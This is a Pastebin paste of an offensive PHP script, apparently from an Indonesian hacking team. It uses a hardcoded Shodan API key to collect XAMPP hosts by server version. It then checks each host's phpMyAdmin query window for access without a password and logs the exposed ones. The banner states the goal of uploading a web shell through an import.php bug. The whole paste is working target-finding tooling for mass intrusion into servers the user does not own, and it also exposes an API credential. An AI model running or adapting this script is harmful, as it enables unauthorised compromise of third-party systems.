Advertisement
shor7cut

Auto Exploit : Xampp PHPMYADMIN (Fix)

Jul 26th, 2015
1,267
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. date_default_timezone_set('asia/jakarta');
  5. cover();
  6. cari_target();
  7. echo "\r\n--------------------------------------\r\n";
  8. function cari_target() {
  9. unlink("target_shor7cut.txt");
  10. //$name_output = "K-exploit-".date("d-m-Y@his").$extension;
  11. $name_output = "K-EXPLOIT.HTML";
  12.  
  13.  
  14.  
  15. // SETTING \\
  16. $no=1;
  17. $nos=1;
  18. $success=0;
  19. $fail=0;
  20. $auth=0;
  21. $dbaru=0;
  22. $api = "z3cBefrV3bmRx2rNZ0E1opuZxXNPrbIR";
  23. $name_lapor = "Laporan.txt";
  24. if($api==""){
  25. echo "[!] Ops... Get Your api in account.shodan.io\r\n";
  26. quit();
  27. }
  28. $total_target=0;
  29. // END:SETTING \\
  30. $dork = array (
  31. 'xampp',
  32. 'xampp Apache/2.2.3',
  33. 'xampp Apache/2.2.4',
  34. 'xampp Apache/2.2.6',
  35. 'xampp Apache/2.2.8',
  36. 'xampp Apache/2.2.9',
  37. 'xampp Apache/2.2.11',
  38. 'xampp Apache/2.2.12',
  39. 'xampp Apache/2.2.14',
  40. 'xampp Apache/2.2.17',
  41. 'xampp Apache/2.2.21',
  42. 'xampp Apache/2.4.2',
  43. 'xampp Apache/2.4.3',
  44. 'xampp Apache/2.4.10',
  45. 'xampp Apache/2.4.12',
  46. 'xampp PHP/5.2.1',
  47. 'xampp PHP/5.2.2',
  48. 'xampp PHP/5.2.3',
  49. 'xampp PHP/5.2.4',
  50. 'xampp PHP/5.2.5',
  51. 'xampp PHP/5.2.6',
  52. 'xampp PHP/5.2.8',
  53. 'xampp PHP/5.2.9',
  54. 'xampp PHP/5.3.0',
  55. 'xampp PHP/5.3.1',
  56. 'xampp PHP/5.3.5',
  57. 'xampp PHP/5.3.8',
  58. 'xampp PHP/5.4.4',
  59. 'xampp PHP/5.4.7',
  60. 'xampp PHP/5.4.31',
  61. 'xampp PHP/5.5.15',
  62. 'xampp PHP/5.5.19',
  63. 'xampp PHP/5.6.3',
  64. 'xampp PHP/5.5.24',
  65. 'xampp PHP/5.6.8',
  66. 'xampp PHP/4.4.5',
  67. 'xampp PHP/4.4.6',
  68. 'xampp PHP/4.4.7',
  69. 'xampp PHP/4.4.8',
  70. 'xampp PHP/4.4.9'
  71. );
  72.  
  73. $total_dork = count($dork);
  74.  
  75.  
  76.  
  77. foreach ($dork as $dorks) {
  78. $noms = "(".$no."/".$total_dork.")";
  79. echo "(+) Mencari Target : ".$noms."\r\n(+) scanned in ";
  80. $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api}&query={$dorks}");
  81. $json = json_decode($get,true);
  82.  
  83. foreach ($json['matches'] as $key => $value) {
  84.  
  85. $fp = fopen("target_shor7cut.txt", 'a+');
  86. fwrite($fp, $value['ip_str']."|");
  87. fclose($fp);
  88.  
  89. } // End Foreach
  90. $target_live = $json['total'];
  91. if($target_live>100){
  92. $target_live=100;
  93. }
  94. $total_target=$target_live+$total_target;
  95. echo round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds | Found -> ".$target_live." \r\n\n";
  96. $no++;
  97. }
  98. echo "[+] Total Target : [".$total_target."]\r\n";
  99. $buka_file = fopen("target_shor7cut.txt", "r");
  100. $baca_file = fgets($buka_file);
  101. $target = explode("|", $baca_file);
  102. echo "[+] Memulai Mencari vulnerable\r\n";
  103. loading();
  104. echo "\r\n";
  105. $start = date("d-m-Y h:i:sa");
  106. foreach ($target as $sites) {
  107. $infos = "Scan : $sites (".$nos."/".$total_target.") - ".$name_output;
  108. echo "-> Info : (".$nos."/".$total_target.") | [S:".$success."/F:".$fail."/A:".$auth."] (DB: ".$dbaru.")\r\n";
  109. echo "-> Target : ".$sites."\r\n";
  110. echo "-> PhpMyadmin : ";
  111. $url = "http://$sites/phpmyadmin/querywindow.php";
  112. $phpmyn = curl_init("$url");
  113. curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
  114. curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
  115. curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
  116. curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
  117. curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
  118. $phpmynresult = curl_exec($phpmyn);
  119. $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
  120. if(preg_match($re, $phpmynresult, $matches)){
  121. if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
  122. echo "Not vulnerable (Auth)\r\n";
  123. $auth++;
  124. }else {
  125. echo "vulnerable\r\n";
  126.  
  127. $hasil_output='<a href="'.$url.'" target=_blank>http://'.$sites.'</a><br>';
  128.  
  129. //-----------------------------------------------------------------\\
  130. //--- JIKA ADA TARGET YANG SAMA MAKA DATA TIDAK DI SIMPAN DI DATABASE
  131. //--- JIKA INGIN MENGHILANGKAN FUNGSI INI SILAHKAN EDIT SENDIRI
  132. //--- Hapus Script yang sudah saya tandai // START // END
  133. //--- Ganti dengan Script dibawah ini
  134. /*
  135. $fp = fopen($name_output, 'a+');
  136. fwrite($fp, $hasil_output);
  137. fclose($fp);
  138. */
  139. //-----------------------------------------------------------------\\
  140.  
  141. //start
  142. $buka_file = file_get_contents($name_log);
  143. if(!eregi($sites, $buka_file)){
  144. //save result
  145. $fp = fopen($name_output, 'a+');
  146. fwrite($fp, $hasil_output);
  147. fclose($fp);
  148. //save log
  149. $fp = fopen("logs_shor7cut.txt", 'a+');
  150. fwrite($fp, $sites."\r\n");
  151. fclose($fp);
  152. echo "-> Save-DB : Telah Ditambahkan\r\n";
  153. }else {
  154. echo "-> Save-DB : Tidak Ditambahkan\r\n";
  155. }
  156.  
  157.  
  158. //end
  159.  
  160.  
  161. $success++;
  162. }
  163. }else {
  164. echo "Not vulnerable\r\n";
  165. $fail++;
  166. }
  167. echo "-> Check Done in ".round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds\r\n\n";
  168. $nos++;
  169.  
  170. }
  171.  
  172. $lapor.= "\r\n\n---------------------------------------\r\n";
  173. $lapor.= " > LAPORAN AKHIR <\r\n";
  174. $lapor.= "\r\n---------------------------------------\r\n";
  175. $lapor.= "-> Total Target : ".$total_target."\r\n";
  176. $lapor.= "-> Total Success :".$success."\r\n";
  177. $lapor.= "-> Total fail :".$fail."\r\n";
  178. $lapor.= "-> Total Auth :".$auth."\r\n";
  179. $lapor.= "-> Total Target Baru :".$dbaru."\r\n";
  180. $lapor.= "-> Output File :".$name_output."\r\n";
  181. $lapor.= "-> Start Scan : ".$start."\r\n";
  182. $lapor.= "-> End Scan : ".date("d-m-Y h:i:sa");
  183. echo $lapor;
  184. $fp = fopen($name_lapor, 'a+');
  185. fwrite($fp, $lapor);
  186. fclose($fp);
  187.  
  188.  
  189. loadings();
  190.  
  191.  
  192.  
  193.  
  194.  
  195. } // akhir fungsi
  196. function loadings() {
  197. cari_target();
  198. }
  199. function loading() {
  200. echo "-> Pleas wait ";
  201. for ($i=0; $i <3; $i++) {
  202. echo ".";
  203. sleep(1);
  204. echo " ";
  205. sleep(1);
  206. } echo "\r\n";
  207. }
  208.  
  209.  
  210. function cover() {
  211. $shor7cut.=" .---. \r\n";
  212. $shor7cut.=" |---| \r\n";
  213. $shor7cut.=" |---| \r\n";
  214. $shor7cut.=" |---| > K-Xploit PhpMyadmin (Multy Killer) < \r\n";
  215. $shor7cut.=" .---^ - ^---. \r\n";
  216. $shor7cut.=" :___________: Code By Shor7cut (Bug7sec Team) \r\n";
  217. $shor7cut.=" | |//| \r\n";
  218. $shor7cut.=" | |//| [DESCRIPTION] \r\n";
  219. $shor7cut.=" | |//| Looking for Target using shodan \r\n";
  220. $shor7cut.=" | |//| Then proceed to search \r\n";
  221. $shor7cut.=" | |.-| Phpmyadmin which has the bug import.php \r\n";
  222. $shor7cut.=" |.-'**| So that we can upload shell \r\n";
  223. $shor7cut.=" \***/ Through the bug import.php \r\n";
  224. $shor7cut.=" \*/ \r\n";
  225. $shor7cut.=" V Thank's : Tuban Cyber Team | IndoXploit | ISD-TEAM \r\n";
  226. $shor7cut.=" Yogyakarta Black Hat | Suram-Crew \r\n";
  227. echo $shor7cut;
  228. } ?>
Advertisement
RAW Paste Data Copied
Advertisement